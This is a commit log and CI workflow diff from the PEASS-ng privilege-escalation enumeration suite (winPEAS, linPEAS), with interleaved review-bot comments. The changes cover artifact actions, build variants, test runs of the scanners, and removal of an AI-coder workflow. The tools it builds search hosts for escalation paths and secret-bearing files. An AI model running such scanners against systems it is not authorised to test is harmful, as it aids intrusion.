2023-08-03 15:29:34 +02:00
RandolphConley
40c47868d2
Merge branch 'carlospolop:master' into master 2023-08-02 16:01:56 -04:00
StevenLtheThird
b617756f80 Update winPEAS.ps1
bug fix: replaced %username% with $env:usernames
Introduced Regex search based on yaml file (integrated to script)
Added -debug switch for timestamps
2023-08-02 15:57:21 -04:00
z004r19n
6c0d00f1cb Fixed Typo 2023-08-01 09:48:37 +02:00
Carlos Polop
9861259bca
Merge pull request #375 from galoget/master
Fix typos, grammar and spacing
2023-07-31 16:56:43 +02:00
Carlos Polop
0ab20b9524
Merge pull request #374 from jahatfi/master
Wrap 'nosh_usrs' user names in word boundaries
2023-07-31 16:55:51 +02:00
Carlos Polop
33bba036ce
Update CI-master_tests.yml 2023-07-31 16:55:07 +02:00
Carlos Polop
89240fc7ea
Delete aicoder.yml 2023-07-31 16:32:13 +02:00
Carlos Polop
3ab9ab8101
Delete AIPRChecker.yml 2023-07-31 16:31:49 +02:00
Carlos Polop
d101acc85c
Merge pull request #377 from makikvues/fix-alphafs-leaked-handle
Fixed AlphaFS dependency, fixed leaked handlers detection
2023-07-31 16:31:12 +02:00
makikvues
869145388d - added progress bar while reading leaked handles 2023-07-30 17:38:57 +02:00
makikvues
bcd52764ba - added alphaFS as 3rd party library
- PrintVulnLeakedHandlers wrapped in try/catch
- removed commented out code in SearchHelper.cs
- added check for empty config in YamlConfigHelper
2023-07-30 11:01:20 +02:00
galoget
6525727ca9
Update peass.rb
Fix typos, grammar and misspelled words.
2023-07-25 12:33:15 -05:00
galoget
41e2367be6
Update linpeas_builder.py
Standardize spacing in comments.
2023-07-25 12:22:14 -05:00
galoget
5e41f694e2
Update linpeas_base.sh
Standardize spacing in comments.
2023-07-25 12:21:36 -05:00
galoget
5e8def70d1
Update 9_interesting_files.sh
Standardize spacing in comments
2023-07-25 12:16:03 -05:00
galoget
f441212026
Update 8_interesting_perms_files.sh
Standardize spacing in comments
2023-07-25 12:13:37 -05:00
galoget
337f210bb9
Update 7_software_information.sh
Fix typos and spacing
2023-07-25 12:11:09 -05:00
galoget
d63f11bc53
Update 3_cloud.sh (Typos)
Fix typos, spacing and added comments.
2023-07-25 11:58:47 -05:00
galoget
210abd9329
Update 2_container.sh (Fix typo)
Fix typo and spacing.
2023-07-25 11:48:55 -05:00
kali.kali
be912ad77e Wrap 'nosh_usrs' user names in word boundaries to prevent false positives when such names are substrings of other strings 2023-07-24 20:06:47 -04:00
Carlos Polop
667bb5220d
Merge pull request #373 from galoget/master
Fix Broken Links for Cloud and Containers Pentesting
2023-07-24 18:52:48 +02:00
galoget
44a3cce5c7
Update 2_container.sh (Fix broken links)
Update script 2_container.sh to fix broken links to Kubernetes Pentesting.
2023-07-24 11:03:05 -05:00
galoget
965ca0868a
Update 3_cloud.sh (Fix broken link)
Update script 3_cloud.sh to fix a broken link to GCP Pentesting.
2023-07-24 10:55:35 -05:00
carlospolop
1279434ba6 Merge branch 'aicoder' of https://github.com/carlospolop/PEASS-ng into aicoder 2023-07-24 10:23:18 +02:00
Carlos Polop
d60fed0f20
Merge pull request #370 from takitakitanana/master
path contains spaces check
2023-07-23 01:51:43 +02:00
Carlos Polop
0a1a0d1e56
Merge pull request #371 from nillyr/linPEAS-builder-fix
Fix linPEAS build
2023-07-23 01:50:01 +02:00
Nicolas GRELLETY
2bc6c94608
Merge remote-tracking branch 'origin/linPEAS-builder-fix' into linPEAS-builder-fix 2023-07-23 00:49:25 +02:00
Nicolas GRELLETY
509e164d6f
🐛 fix linPEAS build
Update search regex due to API change
2023-07-23 00:49:04 +02:00
Nicolas GRELLETY
e7bfabe082
:fix: fix linPEAS builder
Update search regex due to API change
2023-07-23 00:14:26 +02:00
takitakitanana
7c7b17a7cc fixed typo 2023-07-22 03:58:37 +03:00
takitakitanana
2cb6af3f27 path contains spaces check 2023-07-22 03:27:08 +03:00
Carlos Polop
0d75c0085a
Create AIPRChecker.yml 2023-07-20 17:53:51 +02:00
Carlos Polop
bc064ddb88
Update README.md 2023-07-20 17:44:02 +02:00
980 changed files with 89673 additions and 13012 deletions


@ -4,11 +4,12 @@ on:
push: push:
branches: branches:
- master - master
- main
paths-ignore: paths-ignore:
- '.github/**' - '.github/**'
schedule: schedule:
- cron: "5 4 * * SUN" - cron: "5 4 1 * *"
workflow_dispatch: workflow_dispatch:
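Review bot: the `cron` change on the `schedule:` line moves the scheduled build from every Sunday (`5 4 * * SUN`) to the 1st of each month (`5 4 1 * *`), and none of the commit messages in this range mention it; state the reason in the commit message or in a YAML comment beside the entry so the reduced cadence is not mistaken for a typo. The added `- main` branch entry is fine, but note that `paths-ignore: '.github/**'` still means a push that only edits this workflow does not trigger a build on either branch.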
@ -49,7 +50,7 @@ jobs:
- name: run MSBuild - name: run MSBuild
run: msbuild $env:Solution_Path run: msbuild $env:Solution_Path
# Execute all unit tests in the solution - It's broken :( # Execute all unit tests in the solution
#- name: Execute unit tests #- name: Execute unit tests
# run: dotnet test $env:Solution_Path # run: dotnet test $env:Solution_Path
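Review bot: dropping the `It's broken :(` remark leaves the `dotnet test` step still commented out with no explanation; either re-enable the unit tests or keep a one-line comment saying why they are disabled, otherwise the next reader will assume the solution simply has no tests.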
@ -65,6 +66,50 @@ jobs:
echo "build Any CPU" echo "build Any CPU"
msbuild -m $env:Solution_Path /t:Rebuild /p:Configuration=$env:Configuration /p:Platform="Any CPU" msbuild -m $env:Solution_Path /t:Rebuild /p:Configuration=$env:Configuration /p:Platform="Any CPU"
- name: Execute winPEAS -h
shell: pwsh
run: |
$Configuration = "Release"
$exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
if (Test-Path $exePath) {
& $exePath -h
} else {
Write-Error "winPEAS.exe not found at $exePath"
}
- name: Execute winPEAS cloudinfo
shell: pwsh
run: |
$Configuration = "Release"
$exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
if (Test-Path $exePath) {
& $exePath cloudinfo
} else {
Write-Error "winPEAS.exe not found at $exePath"
}
- name: Execute winPEAS systeminfo
shell: pwsh
run: |
$Configuration = "Release"
$exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
if (Test-Path $exePath) {
& $exePath systeminfo
} else {
Write-Error "winPEAS.exe not found at $exePath"
}
- name: Execute winPEAS networkinfo
shell: pwsh
run: |
$Configuration = "Release"
$exePath = "winPEAS/winPEASexe/winPEAS/bin/$Configuration/winPEAS.exe"
if (Test-Path $exePath) {
& $exePath networkinfo
} else {
Write-Error "winPEAS.exe not found at $exePath"
}
# Copy the built versions # Copy the built versions
- name: Copy all versions - name: Copy all versions
run: | run: |
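Review bot: the four new `Execute winPEAS ...` steps hardcode `$Configuration = "Release"` while the build step directly above runs MSBuild with `/p:Configuration=$env:Configuration`, so the `Test-Path` check fails with `winPEAS.exe not found` whenever the workflow is built with any other configuration; read `$env:Configuration` instead, and collapse the four copies of the same script into one step that loops over `-h`, `cloudinfo`, `systeminfo` and `networkinfo`. Also worth a comment in the workflow: the `systeminfo`, `networkinfo` and `cloudinfo` output goes verbatim into the job log, which is public for a public repository; that is acceptable on an ephemeral hosted runner but should not be copied as-is to a self-hosted one.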
@ -99,52 +144,46 @@ jobs:
# Upload all the versions for the release # Upload all the versions for the release
- name: Upload winpeasx64 - name: Upload winpeasx64
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: winPEASx64.exe name: winPEASx64.exe
path: winPEAS\winPEASexe\binaries\x64\Release\winPEASx64.exe path: winPEAS\winPEASexe\binaries\x64\Release\winPEASx64.exe
- name: Upload winpeasx86 - name: Upload winpeasx86
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: winPEASx86.exe name: winPEASx86.exe
path: winPEAS\winPEASexe\binaries\x86\Release\winPEASx86.exe path: winPEAS\winPEASexe\binaries\x86\Release\winPEASx86.exe
- name: Upload winpeasany - name: Upload winpeasany
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: winPEASany.exe name: winPEASany.exe
path: winPEAS\winPEASexe\binaries\Release\winPEASany.exe path: winPEAS\winPEASexe\binaries\Release\winPEASany.exe
- name: Upload winpeasx64ofs - name: Upload winpeasx64ofs
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: winPEASx64_ofs.exe name: winPEASx64_ofs.exe
path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx64_ofs.exe
- name: Upload winpeasx86ofs - name: Upload winpeasx86ofs
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: winPEASx86_ofs.exe name: winPEASx86_ofs.exe
path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASx86_ofs.exe
- name: Upload winpeasanyofs - name: Upload winpeasanyofs
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: winPEASany_ofs.exe name: winPEASany_ofs.exe
path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe path: winPEAS\winPEASexe\binaries\Obfuscated Releases\winPEASany_ofs.exe
- name: Upload winpeas.bat - name: Upload winpeas.bat
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: winPEAS.bat name: winPEAS.bat
path: winPEAS\winPEASbat\winPEAS.bat path: winPEAS\winPEASbat\winPEAS.bat
- name: Upload winpeas.ps1
uses: actions/upload-artifact@v2
with:
name: winPEAS.ps1
path: winPEAS\winPEASps1\winPEAS.ps1
# Git add # Git add
#- name: Create local changes #- name: Create local changes
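Review bot: `actions/upload-artifact@v4` on each `uses:` line is a floating major tag; for a workflow that produces the release binaries people download and run, pin third-party actions to a full commit SHA (with the tag in a trailing comment) so a retagged action cannot change what gets uploaded. The removal of the `Upload winpeas.ps1` step is consistent with the download job below, which never fetched that artifact, but the commit message should say the ps1 artifact is intentionally no longer published. v4 artifacts are immutable and cannot be uploaded twice under one name, so the unique `name:` per step is required, as it already is here.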
@ -189,7 +228,9 @@ jobs:
run: | run: |
python3 -m pip install PyYAML python3 -m pip install PyYAML
cd linPEAS cd linPEAS
python3 -m builder.linpeas_builder python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
python3 -m builder.linpeas_builder --all-no-fat --output linpeas.sh
python3 -m builder.linpeas_builder --small --output linpeas_small.sh
# Build linpeas binaries # Build linpeas binaries
- name: Build linpeas binaries - name: Build linpeas binaries
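Review bot: the three `linpeas_builder` invocations (`--all`, `--all-no-fat`, `--small`) now produce three scripts from one step still named `Build linpeas`; rename the step or add a comment listing the outputs so the download job and the release notes can be matched against it. Separately, `python3 -m pip install PyYAML` has no version pin, so the builder's YAML parsing can change underneath a release build; pin the version or add a requirements file.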
@ -207,35 +248,35 @@ jobs:
# Run linpeas help as quick test # Run linpeas help as quick test
- name: Run linpeas help - name: Run linpeas help
run: linPEAS/linpeas.sh -h run: linPEAS/linpeas_fat.sh -h && linPEAS/linpeas.sh -h && linPEAS/linpeas_small.sh -h
# Run linpeas as a test # Run linpeas as a test
- name: Run linpeas system_information - name: Run linpeas system_information
run: linPEAS/linpeas.sh -o system_information -a run: linPEAS/linpeas_fat.sh -o system_information -a
- name: Run linpeas container - name: Run linpeas container
run: linPEAS/linpeas.sh -o container -a run: linPEAS/linpeas_fat.sh -o container -a
- name: Run linpeas cloud - name: Run linpeas cloud
run: linPEAS/linpeas.sh -o cloud -a run: linPEAS/linpeas_fat.sh -o cloud -a
- name: Run linpeas procs_crons_timers_srvcs_sockets - name: Run linpeas procs_crons_timers_srvcs_sockets
run: linPEAS/linpeas.sh -o procs_crons_timers_srvcs_sockets -a run: linPEAS/linpeas_fat.sh -o procs_crons_timers_srvcs_sockets -a
- name: Run linpeas network_information - name: Run linpeas network_information
run: linPEAS/linpeas.sh -o network_information -t -a run: linPEAS/linpeas_fat.sh -o network_information -t -a
- name: Run linpeas users_information - name: Run linpeas users_information
run: linPEAS/linpeas.sh -o users_information -a run: linPEAS/linpeas_fat.sh -o users_information -a
- name: Run linpeas software_information - name: Run linpeas software_information
run: linPEAS/linpeas.sh -o software_information -a run: linPEAS/linpeas_fat.sh -o software_information -a
- name: Run linpeas interesting_perms_files - name: Run linpeas interesting_perms_files
run: linPEAS/linpeas.sh -o interesting_perms_files -a run: linPEAS/linpeas_fat.sh -o interesting_perms_files -a
- name: Run linpeas interesting_files - name: Run linpeas interesting_files
run: linPEAS/linpeas.sh -o interesting_files -a run: linPEAS/linpeas_fat.sh -o interesting_files -a
# Too much time # Too much time
#- name: Run linpeas api_keys_regex #- name: Run linpeas api_keys_regex
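Review bot: only `linpeas_fat.sh` is exercised per module in the `Run linpeas ...` steps; `linpeas.sh` and `linpeas_small.sh` are run only with `-h`, so a module that is broken or silently dropped in the no-fat or small build (for example by the builder's exclude logic) passes CI. Run at least `system_information` and `interesting_files` against all three outputs, or run the full set in a matrix over the three scripts.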
@ -243,51 +284,57 @@ jobs:
# Upload files for release # Upload files for release
- name: Upload linpeas.sh - name: Upload linpeas.sh
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas.sh name: linpeas.sh
path: linPEAS/linpeas.sh path: linPEAS/linpeas.sh
- name: Upload linpeas_fat.sh - name: Upload linpeas_fat.sh
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas_fat.sh name: linpeas_fat.sh
path: linPEAS/linpeas_fat.sh path: linPEAS/linpeas_fat.sh
- name: Upload linpeas_small.sh
uses: actions/upload-artifact@v4
with:
name: linpeas_small.sh
path: linPEAS/linpeas_small.sh
## Linux bins ## Linux bins
- name: Upload linpeas_linux_386 - name: Upload linpeas_linux_386
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas_linux_386 name: linpeas_linux_386
path: sh2bin/builds/linpeas_linux_386 path: sh2bin/builds/linpeas_linux_386
- name: Upload linpeas_linux_amd64 - name: Upload linpeas_linux_amd64
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas_linux_amd64 name: linpeas_linux_amd64
path: sh2bin/builds/linpeas_linux_amd64 path: sh2bin/builds/linpeas_linux_amd64
- name: Upload linpeas_linux_arm - name: Upload linpeas_linux_arm
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas_linux_arm name: linpeas_linux_arm
path: sh2bin/builds/linpeas_linux_arm path: sh2bin/builds/linpeas_linux_arm
- name: Upload linpeas_linux_arm64 - name: Upload linpeas_linux_arm64
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas_linux_arm64 name: linpeas_linux_arm64
path: sh2bin/builds/linpeas_linux_arm64 path: sh2bin/builds/linpeas_linux_arm64
## Darwin bins ## Darwin bins
- name: Upload linpeas_darwin_amd64 - name: Upload linpeas_darwin_amd64
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas_darwin_amd64 name: linpeas_darwin_amd64
path: sh2bin/builds/linpeas_darwin_amd64 path: sh2bin/builds/linpeas_darwin_amd64
- name: Upload linpeas_darwin_arm64 - name: Upload linpeas_darwin_arm64
uses: actions/upload-artifact@v2 uses: actions/upload-artifact@v4
with: with:
name: linpeas_darwin_arm64 name: linpeas_darwin_arm64
path: sh2bin/builds/linpeas_darwin_arm64 path: sh2bin/builds/linpeas_darwin_arm64
@ -321,14 +368,14 @@ jobs:
# Build linpeas # Build linpeas
- name: Build macpeas - name: Build macpeas
run: | run: |
python3 -m pip install PyYAML python3 -m pip install PyYAML --break-system-packages
python3 -m pip install requests python3 -m pip install requests --break-system-packages
cd linPEAS cd linPEAS
python3 -m builder.linpeas_builder python3 -m builder.linpeas_builder --all --output linpeas_fat.sh
# Run linpeas help as quick test # Run linpeas help as quick test
- name: Run macpeas help - name: Run macpeas help
run: linPEAS/linpeas.sh -h run: linPEAS/linpeas_fat.sh -h
# Run macpeas parts to test it # Run macpeas parts to test it
#- name: Run macpeas #- name: Run macpeas
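Review bot: `--break-system-packages` on both `pip install` lines tells pip to write into the macOS runner's externally managed system interpreter (PEP 668); it works on the hosted runner but is the wrong fix: create a venv (`python3 -m venv .venv && . .venv/bin/activate`) and install `PyYAML` and `requests` there, which keeps the build reproducible and needs no override. The macpeas job also still builds only the fat variant and tests it only with `-h`, unlike the Linux job above.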
@ -342,77 +389,82 @@ jobs:
steps: steps:
# Download files to release # Download files to release
- name: Download winpeasx64ofs - name: Download winpeasx64ofs
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: winPEASx64_ofs.exe name: winPEASx64_ofs.exe
- name: Download winpeasx86ofs - name: Download winpeasx86ofs
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: winPEASx86_ofs.exe name: winPEASx86_ofs.exe
- name: Download winpeasanyofs - name: Download winpeasanyofs
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: winPEASany_ofs.exe name: winPEASany_ofs.exe
- name: Download winpeasx64 - name: Download winpeasx64
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: winPEASx64.exe name: winPEASx64.exe
- name: Download winpeasx86 - name: Download winpeasx86
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: winPEASx86.exe name: winPEASx86.exe
- name: Download winpeasany - name: Download winpeasany
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: winPEASany.exe name: winPEASany.exe
- name: Download winpeas.bat - name: Download winpeas.bat
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: winPEAS.bat name: winPEAS.bat
- name: Download linpeas.sh - name: Download linpeas.sh
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas.sh name: linpeas.sh
- name: Download linpeas_fat.sh - name: Download linpeas_fat.sh
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas_fat.sh name: linpeas_fat.sh
- name: Download linpeas_small.sh
uses: actions/download-artifact@v4.1.7
with:
name: linpeas_small.sh
- name: Download linpeas_linux_386 - name: Download linpeas_linux_386
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas_linux_386 name: linpeas_linux_386
- name: Download linpeas_linux_amd64 - name: Download linpeas_linux_amd64
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas_linux_amd64 name: linpeas_linux_amd64
- name: Download linpeas_linux_arm - name: Download linpeas_linux_arm
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas_linux_arm name: linpeas_linux_arm
- name: Download linpeas_linux_arm64 - name: Download linpeas_linux_arm64
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas_linux_arm64 name: linpeas_linux_arm64
- name: Download linpeas_darwin_amd64 - name: Download linpeas_darwin_amd64
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas_darwin_amd64 name: linpeas_darwin_amd64
- name: Download linpeas_darwin_arm64 - name: Download linpeas_darwin_arm64
uses: actions/download-artifact@v2 uses: actions/download-artifact@v4.1.7
with: with:
name: linpeas_darwin_arm64 name: linpeas_darwin_arm64
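Review bot: `actions/download-artifact@v4.1.7` is a better pin than the `@v4` used on the upload side because it is an exact version tag, but tags remain mutable; pin both download and upload to commit SHAs. Keeping both sides in the same major is required (a v4 download cannot read v2 uploads), which this change does. The new `Download linpeas_small.sh` step is correctly paired with the new upload step above.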


@ -1,23 +0,0 @@
name: aicoder
on:
workflow_dispatch:
jobs:
Build_and_test_winpeas_master:
runs-on: ubuntu-latest
steps:
# checkout
- name: AICoder GH Action
uses: AICoderHub/GH_Action@v0.11
with:
INPUT_MODE: 'file-optimizer'
INPUT_PROMPT: ''
INPUT_OPENAI_API_KEY: ${{ secrets.OPENAI_API_KEY }}
INPUT_MODEL: 'gpt-4'
TEMPLATE_FILES: ''
ORIGIN_BRANCH: 'aicoder'
TO_BRANCH: 'master'
CHECK_PATH: './parsers/json2pdf.py'
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
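Review bot: deleting this workflow removes a job that handed `secrets.OPENAI_API_KEY` and `secrets.GITHUB_TOKEN` to a third-party action pinned only by the floating tag `AICoderHub/GH_Action@v0.11`; after the merge, delete the now unused `OPENAI_API_KEY` repository secret and rotate the key, since every past run exposed it to whatever that tag pointed at. The commit message should say the AI-assisted PR flow is being retired rather than just removing the file.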

.github/workflows/artifacts_cleanup.yml vendored Normal file

@ -0,0 +1,14 @@
name: 'nightly artifacts cleanup'
on:
schedule:
- cron: '0 6 * * 2' # At 6am on Tuesdays
workflow_dispatch:
jobs:
delete-artifacts:
runs-on: ubuntu-latest
steps:
- uses: kolpav/purge-artifacts-action@v1
with:
token: ${{ secrets.GITHUB_TOKEN }}
expire-in: 1days # Set this to 0 to delete all artifacts
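Review bot: `kolpav/purge-artifacts-action@v1` receives `secrets.GITHUB_TOKEN` with whatever default permissions the repository grants, and the workflow declares no `permissions:` block; add `permissions: actions: write` at the job level so the token can do nothing but manage artifacts, and pin the action to a commit SHA rather than `@v1`. Also `expire-in: 1days` combined with a Tuesday-only `cron` means artifacts can still live up to a week, so the `At 6am on Tuesdays` comment should say so.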

.gitignore vendored

@ -1,4 +1,5 @@
.vs/* .vs/*
.vscode/*
winPEAS/winPEASexe/.vs/* winPEAS/winPEASexe/.vs/*
v16/* v16/*
winPEAS/winPEASexe/.vs/winPEAS/v16/* winPEAS/winPEASexe/.vs/winPEAS/v16/*
@ -24,6 +25,8 @@ __pycache__
linPEAS/builder/__pycache__/* linPEAS/builder/__pycache__/*
linPEAS/builder/src/__pycache__/* linPEAS/builder/src/__pycache__/*
linPEAS/linpeas.sh linPEAS/linpeas.sh
linPEAS/builder/linpeas_base_tmp.sh
build_lists/regexes.yaml
sh2bin sh2bin
sh2bin/* sh2bin/*
.dccache .dccache
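Review bot: the `.gitignore` hunk ignores `linPEAS/linpeas.sh` and the new `linPEAS/builder/linpeas_base_tmp.sh`, but the workflow in this same change now also writes `linPEAS/linpeas_fat.sh` and `linPEAS/linpeas_small.sh`, so local builds will leave those two as untracked files and invite an accidental commit of a generated script; add both next to `linPEAS/linpeas.sh`.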


@ -1,208 +0,0 @@
import argparse
import os
import sys
import string
import random
from typing import List
import openai
import json
import subprocess
import tiktoken
import requests
from github import Github
#########################
#### OPENAI FUNCTIONS ###
#########################
def reportTokens(prompt, model="gpt-4"):
encoding = tiktoken.encoding_for_model(model)
print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
def write_file(file_path: str, content: str):
"""Write content to a file creating the needed directories first"""
os.makedirs(os.path.dirname(file_path), exist_ok=True)
with open(file_path, "w") as file:
file.write(content)
def delete_file(file_path: str):
"""Delete a file if it exists"""
if os.path.isfile(file_path):
os.remove(file_path)
openai_available_functions = {
"write_file": write_file, "delete_file": delete_file
}
openai_functions = [
{
"name": "write_file",
"description": "Write a file giving the path and the content",
"parameters": {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "Path to the file to write",
},
"content": {
"type": "string",
"description": "Content to write in the file",
},
},
"required": ["file_path", "content"],
},
},
{
"name": "delete_file",
"description": "Delete a file",
"parameters": {
"type": "object",
"properties": {
"file_path": {
"type": "string",
"description": "Path to the file to write",
}
},
"required": ["file_path"],
},
}
]
#########################
#### GIT FUNCTIONS ######
#########################
def create_pull_request(branch_name, commit_message, github_token):
github = Github(github_token)
repo = github.get_repo(os.environ["GITHUB_REPOSITORY"])
# Create a new branch
base_branch = repo.get_branch(repo.default_branch)
repo.create_git_ref(ref=f"refs/heads/{branch_name}", sha=base_branch.commit.sha)
# Commit changes to the new branch
subprocess.run(["git", "checkout", branch_name])
subprocess.run(["git", "add", "."])
subprocess.run(["git", "commit", "-m", commit_message])
subprocess.run(["git", "push", "origin", branch_name])
# Create a pull request
pr = repo.create_pull(
title=commit_message,
body="Generated by OpenAI Github Action",
head=branch_name,
base=repo.default_branch
)
return pr.html_url
#########################
#### FILE PROCESSING ####
#########################
def process_file(prompt: str, api_key: str, file_path: str, model: str="gpt-4") -> str:
with open(file_path, "r") as file:
file_content = file.read()
messages = [
{"role": "system", "content": f"You are a developer and your goal is to generate code. The user will ask you to improve and modify some code. Your response must be a valid JSON with the path of each file to write as keys and the content of the files as values. Several files can be written at the same time."},
{"role": "user", "content": prompt},
{"role": "user", "content": f"This is the code from the file '{file_path}':\n\n{file_content}"}
]
openai.api_key = api_key
reportTokens(f"This is the code from the file '{file_path}':\n\n{file_content}")
response = openai.ChatCompletion.create(
model=model,
messages=messages,
temperature=0
)
response_message = response["choices"][0]["message"]
# Step 2: check if GPT wanted to call a function
if response_message.get("function_call"):
function_name = response_message["function_call"]["name"]
fuction_to_call = openai_available_functions[function_name]
function_args = json.loads(response_message["function_call"]["arguments"])
fuction_to_call(**function_args)
def process_folder(prompt: str, api_key: str, folder_path: str, model: str="gpt-4") -> List[str]:
responses = []
for root, _, files in os.walk(folder_path):
for file in files:
file_path = os.path.join(root, file)
response = process_file(prompt, api_key, file_path, model)
responses.append(response)
#########################
#### MAIN FUNCTION ######
#########################
def get_random_string(length):
# With combination of lower and upper case
letters = string.ascii_letters
result_str = ''.join(random.choice(letters) for i in range(length))
return result_str
def main(prompt: str, api_key: str, file_path: str, github_token: str, model: str="gpt-4"):
if os.path.isfile(file_path):
process_file(prompt, api_key, file_path, model)
elif os.path.isdir(file_path):
process_folder(prompt, api_key, file_path, model)
else:
print("Error: Invalid file path.")
sys.exit(1)
try:
create_pull_request(get_random_string(5), f"Modified {file_path}", github_token)
except Exception as e:
print(f"Error: Failed to create pull request. {e}")
sys.exit(1)
if __name__ == "__main__":
# Setup the argument parser
parser = argparse.ArgumentParser()
# Add arguments for prompt, api_key, file_path and github_token
parser.add_argument('--prompt', default=None, type=str, help='Input prompt')
parser.add_argument('--api-key', default=None, type=str, help='Input API key')
parser.add_argument('--path', default=None, type=str, help='Input file/folder path')
parser.add_argument('--github-token', default=None, type=str, help='Github token')
parser.add_argument('--model', default="gpt-4", type=str, help='Model to use')
# Parse the arguments
args = parser.parse_args()
prompt = os.environ.get("INPUT_PROMPT", args.prompt)
api_key = os.environ.get("INPUT_API_KEY", args.api_key)
file_path = os.environ.get("INPUT_FILE_PATH", args.path)
github_token = os.environ.get("GITHUB_TOKEN", args.github_token)
model = os.environ.get("INPUT_MODEL", args.model)
if not prompt or not api_key or not file_path:
print("Error: Missing required inputs.")
sys.exit(1)
#if not github_token:
# print("Error: Missing github token.")
# sys.exit(1)
if os.path.exists(prompt):
with open(prompt, "r") as file:
prompt = file.read()
if prompt.startswith("http"):
prompt = requests.get(prompt).text
main(prompt, api_key, file_path, github_token, model)
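Review bot: removing this script is the right call and closes a real hole: `write_file` ran `os.makedirs(os.path.dirname(file_path))` and wrote whatever path the model returned in `function_call`, with no check that it stayed inside the repository, and `create_pull_request` chained `git checkout/add/commit/push` through `subprocess.run` without `check=True`, so a failed checkout would have committed and pushed from whatever branch was current. Two further points worth recording in the commit message: the script read `INPUT_API_KEY` (the `api_key = os.environ.get(...)` line) while the deleted workflow passed `INPUT_OPENAI_API_KEY`, so the action could never have worked as wired, and `process_file` never passed `functions=openai_functions` to `ChatCompletion.create`, so the `function_call` branch was dead code.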


@ -1,19 +1,19 @@
# Contributing to this repository # Contributing to this repository
## Making Suggestions ## Making Suggestions
If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)** If you want to make a suggestion for linpeas or winpeas please use **[github issues](https://github.com/peass-ng/PEASS-ng/issues)**
## Do don't know how to help? ## Do don't know how to help?
Check out the **[TODO](https://github.com/carlospolop/PEASS-ng/blob/master/TODO.md) page** Check out the **[TODO](https://github.com/peass-ng/PEASS-ng/blob/master/TODO.md) page**
## Searching for files with sensitive information ## Searching for files with sensitive information
From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** file. From the PEASS-ng release **winpeas and linpeas are auto-built** and will search for files containing sensitive information specified in the **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** file.
If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file. If you want to **contribute adding the search of new files that can contain sensitive information**, please, just update **[sesitive_files.yaml](https://github.com/peass-ng/PEASS-ng/blob/master/build_lists/sensitive_files.yaml)** and create a **PR to master** (*linpeas and winpeas will be auto-built in this PR*). You can find examples of how to contribute to this file inside the file.
Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud. Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud.
## Specific LinPEAS additions ## Specific LinPEAS additions
